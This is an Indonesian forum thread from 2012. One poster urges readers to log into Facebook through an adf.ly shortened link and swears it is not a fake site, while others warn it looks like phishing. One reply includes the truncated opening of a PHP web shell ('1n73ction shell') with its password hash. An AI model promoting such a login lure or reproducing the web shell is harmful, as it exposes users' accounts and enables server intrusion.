Penulis Topik: Akses FB cara & gaya baru  (Dibaca 3157 kali)

Offline AbelzTheSmadaver™

  • Pro200
  • *****
  • Tulisan: 212
  • Reputation: 1054
  • TODI ( Team Of Dollar Indonesia )
    • Lihat Profil
Akses FB cara & gaya baru
« pada: Juni 23, 2012, 04:23:35 PM »
Selama ini kita hanya buka fb dengan url facebook.com , m.facebook.com , atau 0.facebook.com << yang pengen gratisan  ^_^

Tapi nih ada cara buka fb & gaya baru  , silahkan klik link ini 100 % bukan situs fb palsu , ANE JAMIN !! , sebelumnya ane juga sering login disini hasilnya...

Fantastic !!  :-bd :-bd :-bd :-bd :-bd :-bd :-bd :-bd

Langsung coba :: http://adf.ly/9zPVh

NB : klik skip ads 5 sec yah.... ;)

Offline ViperGM

  • Pro500
  • ******
  • Tulisan: 3.352
  • Reputation: 64108
  • Jenis kelamin: Pria
  • Visual Basic
    • Lihat Profil
    • Daftar Situs Pasang Iklan Gratis Tanpa Daftar
Re: Akses FB cara & gaya baru
« Jawab #1 pada: Juni 23, 2012, 06:00:37 PM »
Fantastic apanya ?

Offline alan_naufal

  • Pro100
  • ****
  • Tulisan: 135
  • Reputation: 202
    • Lihat Profil
    • 4ward antivirus official web
Re: Akses FB cara & gaya baru
« Jawab #2 pada: Juni 23, 2012, 06:16:40 PM »
hati-hati phising
<?php
/* (1n73ction shell v3.1 by x'1n73ct|default pass:" 1n73ction ") */
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.

Offline :Pak:Bos:

  • Pro500
  • ******
  • Tulisan: 868
  • Reputation: 22166
  • Jenis kelamin: Pria
  • mencari jatidiri..
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #3 pada: Juni 23, 2012, 07:06:08 PM »
wah phising/fake login

facebook tidak akan mengijinkan form loginnya diredirect oleh situs lain..
dan pastinya pas login facebook akan menggunakan secure https

Offline AbelzTheSmadaver™

  • Pro200
  • *****
  • Tulisan: 212
  • Reputation: 1054
  • TODI ( Team Of Dollar Indonesia )
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #4 pada: Juni 23, 2012, 08:20:20 PM »
sebenarnya bukan phising / fake login . URL itu hanya mengarahkan kita ke apps di situs www.facebook.com yang sesungguhnya dengan gaya yang baru . Tapi sekarang facebook sudah memblokir adf.ly makanya muncul pesan kita suruh reset kata sandi/password , dsb :D

Offline HyperLinx

  • Pro200
  • *****
  • Tulisan: 230
  • Reputation: 251
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #5 pada: Juni 23, 2012, 08:42:36 PM »
gaya baru? atau akses fesbuk dengan URL lain? kenapa harus dengan adfly??  :o

kalau mau akses cepat buat ke fesbuk gunakan url "fb.me", lebih singkat daripada "facebook.com:-bd

Offline AbelzTheSmadaver™

  • Pro200
  • *****
  • Tulisan: 212
  • Reputation: 1054
  • TODI ( Team Of Dollar Indonesia )
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #6 pada: Juni 23, 2012, 09:01:31 PM »
gaya baru? atau akses fesbuk dengan URL lain? kenapa harus dengan adfly??  :o

kalau mau akses cepat buat ke fesbuk gunakan url "fb.me", lebih singkat daripada "facebook.com"  :-bd

Memang sih , tapi fb.me udh banyak diketaui orang , nggak seru . Klo nggak mau adfly nanti saya carikan yg lain , beres ;) tapi sementara pakai itu dulu ok ? :-bd
« Edit Terakhir: Juni 23, 2012, 09:06:41 PM oleh AbelzTheSmadaver™ »

Offline :Pak:Bos:

  • Pro500
  • ******
  • Tulisan: 868
  • Reputation: 22166
  • Jenis kelamin: Pria
  • mencari jatidiri..
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #7 pada: Juni 23, 2012, 09:56:30 PM »
mau facebookan aja repot amat :D

biasanya cara tsb digunakan untuk phising/fake login.
jadi pastinya banyak yg gak percaya..

Offline ViperGM

  • Pro500
  • ******
  • Tulisan: 3.352
  • Reputation: 64108
  • Jenis kelamin: Pria
  • Visual Basic
    • Lihat Profil
    • Daftar Situs Pasang Iklan Gratis Tanpa Daftar
Re: Akses FB cara & gaya baru
« Jawab #8 pada: Juni 24, 2012, 12:06:38 AM »
Jadi itu link menuju ke FB ?

Offline AbelzTheSmadaver™

  • Pro200
  • *****
  • Tulisan: 212
  • Reputation: 1054
  • TODI ( Team Of Dollar Indonesia )
    • Lihat Profil
Re: Akses FB cara & gaya baru
« Jawab #9 pada: Juni 24, 2012, 07:00:55 AM »
mau facebookan aja repot amat :D

biasanya cara tsb digunakan untuk phising/fake login.
jadi pastinya banyak yg gak percaya..

Nggak kok , klo g percaya liat aja di kolom url yang setelah dialihkan , tulisannya jelas www.facebook.com , bukan situs lainnya

Jadi itu link menuju ke FB ?


Yup :)